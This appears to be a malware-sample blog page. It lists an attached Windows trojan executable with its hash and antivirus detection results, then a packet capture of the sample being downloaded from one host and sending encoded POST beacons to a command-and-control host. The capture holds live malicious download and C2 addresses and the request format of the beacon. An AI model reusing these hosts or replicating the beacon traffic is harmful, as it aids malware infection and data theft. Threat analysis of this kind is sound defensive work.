Download Attachments
-
1
8848
Date added: May 15, 2017 2:40 am
Added by: admin
File size: 63 KB
Downloads: 250
SHA256: 3977145723a78e6c2f70a2c5b05cc21e0f3a7552f66ae8223ed67c614819e6a4
File name: 8848275c18.exe
Detection ratio: 42 / 60
Analysis date: 2017-05-14 22:16:11 UTC ( 0 minutes ago )
Ad-Aware Gen:Variant.Zusy.236832 20170514
AegisLab Backdoor.W32.Androm!c 20170514
Antiy-AVL Trojan[Backdoor]/Win32.Androm 20170514
Arcabit Trojan.Zusy.D39D20 20170514
Avast Win32:Malware-gen 20170514
AVG Inject3.CMBE 20170514
Avira (no cloud) TR/Dropper.Gen 20170514
AVware Trojan.Win32.Generic!BT 20170514
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9986 20170503
BitDefender Gen:Variant.Zusy.236832 20170514
Bkav HW32.Packed.6A39 20170513
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170130
DrWeb Trojan.Inject2.53489 20170514
Emsisoft Gen:Variant.Zusy.236832 (B) 20170514
Endgame malicious (high confidence) 20170503
ESET-NOD32 a variant of Win32/Injector.DOEX 20170514
F-Secure Gen:Variant.Zusy.236832 20170514
Fortinet W32/Androm.DOEX!tr.bdr
2017-05-14 21:39:18.826218 IP 192.168.1.102.58272 > 104.27.190.41.80: Flags [P.], seq 0:410, ack 1, win 256, length 410: HTTP: GET /download/8848275c18.exe HTTP/1.1
E…{.@……..fh..)…Pm.K.T.q7P….K..GET /download/8848275c18.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: directlink.cz
Connection: Keep-Alive
2017-05-14 21:39:30.280665 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [P.], seq 0:300, ack 1, win 256, length 300: HTTP: POST /vad/order.php?page=106 HTTP/1.1
E..T..@…C_…f..@….P….a>4(P…_…POST /vad/order.php?page=106 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: morpoho.club
Content-Length: 964
Cache-Control: no-cache
2017-05-14 21:39:30.553845 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [P.], seq 300:1264, ack 1, win 256, length 964: HTTP
E…..@…@….f..@….P….a>4(P….S..zyxwv=90f7e415a23ea48f3ca805f15a18dee69f&xurolifcz=63894569&bcdefgh=70F4990E4D2E32B7A5043C793383B2D4A4E0BE94CEAB7E6FFDA99B7FE5EF4B7B60C32C08DDBF02E4D61459E031A80E30402DAB7
1A5347429ABFA3D7EA44A94470D355070D15BA49CF46BD1005965CE8348B1018F0486FC5FF983905FC8FFA30EF38AD4B07F717E9B4DABCA6BFF6AD6598A7F3B6489ACFF37C666A3033CBEDFE8B65C019EFCF70723F66531A6A58E779C3B29801E4F137A20B91D8468BD
37687FBA04546C&dgjmpsvyb1=61F04BC27EF021C250F01EC245F003C243F01CC266F010C256F010C27EF01CC246F01FC251F02DC24FF006C254F010C258F005C25BF013C256F05FC247F009C247F0&dgjmpsvyb2=4BF014C25AF001C24EF01EC250F014C20CF014C25
AF014C2&dgjmpsvyb3=75F038C26CF05CC264F046C212F046C214F03AC276F020C213F021C217F02DC250F008C216F006C24CF0&dgjmpsvyb4=6BF01FC256F014C24EF059C270F058C202F032C24DF003C247F059C276F03CC20BF043C202F020C257F010C246F051C2
61F021C277F051C202F051C202F020C21AF042C212F041C202F051C262F051C210F05FC217F041C265F039C258F0&dgjmpsvyb5=74F03CC255F010C250F014C202F022C274F036C263F051C211F035C2
2017-05-14 21:39:30.912164 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [.], ack 287, win 255, length 0
E..(..@…D….f..@….P….a>5FP….=……..
Please follow and like us: